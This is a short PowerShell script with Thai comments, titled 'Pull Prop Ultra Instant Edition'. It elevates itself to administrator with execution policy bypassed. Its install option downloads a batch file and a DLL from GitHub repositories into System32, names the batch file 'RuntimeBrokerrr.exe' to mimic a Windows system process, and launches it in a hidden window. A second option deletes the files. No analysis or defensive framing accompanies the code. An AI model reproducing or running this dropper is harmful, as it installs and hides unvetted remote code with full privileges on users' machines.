# ==========================================================
# 💀 PULL PROP ULTRA INSTANT EDITION | 29/10/2025
# ==========================================================

Write-Host ""
Write-Host " WELCOME TO PULL PROP " -ForegroundColor Cyan
Write-Host " © 2025 | PIGGY PROJECT " -ForegroundColor Gray
Write-Host ""
Write-Host " [1] Install & Run (ออกเลยใน 0.1 วิ)" -ForegroundColor Red -BackgroundColor Yellow
Write-Host " [2] Clean" -ForegroundColor Yellow
Write-Host ""
$choice = Read-Host ">>> Enter your choice (1/2)"

# ขอสิทธิ์แอดมินทันที
if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Start-Process -FilePath "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -File `"$PSCommandPath`"" -Verb RunAs
    exit
}

if ($choice -eq "1") {
    Write-Host "`n[💀] กำลังออกให้เลยตามคำขอ..." -ForegroundColor Red
    $exe = "$env:windir\System32\RuntimeBrokerrr.exe"
    $dll = "$env:windir\System32\Guna.UI2.dll"

    # ดึงไฟล์พร้อมกันแบบไม่รอ
    Invoke-WebRequest -Uri "https://github.com/ORRYxyz/cccc/raw/main/test.bat" -OutFile $exe -UseBasicParsing -TimeoutSec 15
    Invoke-WebRequest -Uri "https://github.com/NAWINNNNNNNNNNNNNNNNNNNNNNNNNNN/WEBSEA1213/raw/refs/heads/main/Guna.UI2.dll" -OutFile $dll -UseBasicParsing -TimeoutSec 15

    # ออกเลยทันที ไม่มีข้อความ ไม่มีดีเลย์
    Start-Process -FilePath $exe -WindowStyle Hidden

    # ปิดสคริปต์ตัวเองทันที
    exit
}

elseif ($choice -eq "2") {
    Stop-Process -Name "RuntimeBrokerrr" -Force -ErrorAction SilentlyContinue
    Remove-Item "$env:windir\System32\RuntimeBrokerrr.exe" -Force -ErrorAction SilentlyContinue
    Remove-Item "$env:windir\System32\Guna.UI2.dll" -Force -ErrorAction SilentlyContinue
    Write-Host "`n[🧹] ลบเรียบร้อยแล้วครับ" -ForegroundColor Green
}

else {
    Write-Host "`n[✖] กดแค่ 1 หรือ 2 เท่านั้น !" -ForegroundColor Red
}
